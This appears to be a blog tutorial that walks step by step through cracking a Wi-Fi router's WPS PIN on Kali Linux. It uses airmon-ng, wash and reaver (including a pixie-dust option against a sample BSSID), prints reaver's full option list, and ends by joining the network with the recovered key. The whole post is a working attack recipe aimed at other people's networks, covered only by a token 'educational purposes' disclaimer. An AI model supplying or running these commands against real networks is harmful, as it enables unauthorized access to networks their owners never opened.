How To Hack WIFI WPS pin With Kali Linux

Today I’m gonna tell you.

HOW TO HACK WIFI WPS PIN.

Kali Linux can be used for many things, but it probably is best known for its ability to penetration test, or hack wifi wps pin. There are hundreds of Windows applications that claim they can hack WPA , don’t get them! They’re just scams, used by professional hackers, to lure newbie or wannabe hackers into getting hacked themselves.

Warning..!! WIFI hacking is illegal.
“This tutorial is only for educational purposes. I am not responsible for any consequences.”

Hack WIFI WPS PIN using reaver method.

So lets Start Cracking

Step 1: Open Terminal and Find out the name of your wireless adapter. , type ifconfig on a terminal. See the result. (here my wireless adapter is ‘wlan0’).



 Step 2: Enable Monitor mode. Now, we use a tool called airmon-ng to create a virtual interface called mon. Just type.

• airmon-ng start wlan0

Step 3: Type the following commands on terminal.

• airmon-ng check kill

Step 4 :   To find WPS networks ,we'll use wash -i wlan0mon to view .You’ll see the name of the wifi.

• wash -i wlan0mon

Step 5 : Note down the BSSID of wifi which you want to crack.

Launching reaver attakck

 

HOW TO HACK WIFI WPS PIN

 

Step 6 :
to launch reaver attack enter below command in terminal.

• reaver -i (wirlress_interface) -b (BSSID) -vv

For ex. : reaver -i wlan0mon -b 28:C6:8E:D7:81:30 -vv

 



Step 7 : If this Method fails try with different options of reaver listed below or simply find it by below command.

• reaver help

reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

Required Arguments:
-i, --interface=<wlan>          Name of the monitor-mode interface to use
-b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
-m, --mac=<mac>                 MAC of the host system
-e, --essid=<ssid>              ESSID of the target AP
-c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
-o, --out-file=<file>           Send output to a log file [stdout]
-s, --session=<file>            Restore a previous session file
-C, --exec=<command>            Execute the supplied command upon successful pin recovery
-D, --daemonize                 Daemonize reaver
-a, --auto                      Auto detect the best advanced options for the target AP
-f, --fixed                     Disable channel hopping
-5, --5ghz                      Use 5GHz 802.11 channels
-v, --verbose                   Display non-critical warnings (-vv for more)
-q, --quiet                     Only display critical messages
-K  --pixie-dust=<number>       [1] Run pixiewps with PKE, PKR, E-Hash1, E-Hash2 and E-Nonce (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass              Do NOT run reaver to auto retrieve WPA password if Pixiewps attack is successful
-h, --help                      Show help

Advanced Options:
-p, --pin=<wps pin>             Use the specified 4 or 8 digit WPS pin
-d, --delay=<seconds>           Set the delay between pin attempts [1]
-l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num>        Quit after num pin attempts
-x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
-t, --timeout=<seconds>         Set the receive timeout period [5]
-T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.20]
-A, --no-associate              Do not associate with the AP (association must be done by another application)
-N, --no-nacks                  Do not send NACK messages when out of order packets are received
-S, --dh-small                  Use small DH keys to improve crack speed
-L, --ignore-locks              Ignore locked state reported by the target AP
-E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
-n, --nack                      Target AP always sends a NACK [Auto]
-w, --win7                      Mimic a Windows 7 registrar [False]
-X, --exhaustive                Set exhaustive mode from the beginning of the session [False]
-1, --p1-index                  Set initial array index for the first half of the pin [False]
-2, --p2-index                  Set initial array index for the second half of the pin [False]
-P, --pixiedust-loop            Set into PixieLoop mode (doesn't send M4, and loops through to M3) [False]
-W, --generate-pin              Default Pin Generator by devttys0 team [1] Belkin [2] D-Link

 

Step 8 : Cracking with WPS PIXIE tool by following command .

• reaver -i wlan0mon -b 28:C6:8E:D7:81:30 -vv -n -K 1 (this one is successful for  me, may options vary with you)
  

Got WPS PIN Trying for wpa/wpa2 key.




Srep 9 :  Stop monitor mode of wireless interface and start the services networking , network-manager.

• airmon-ng stop wlan0mon


• service networking start


• service network-manager start

Step 10 :  Open Netwrok Manager and select wifi to connect & Enter the KEY that you got.





Find any issue or help comment below.

Read more about what is  Kali linux And  how to install kali linux 

 

Youtube video link : https://www.youtube.com/watch?v=GEkN_6H_IC8

[youtube https://www.youtube.com/watch?v=GEkN_6H_IC8]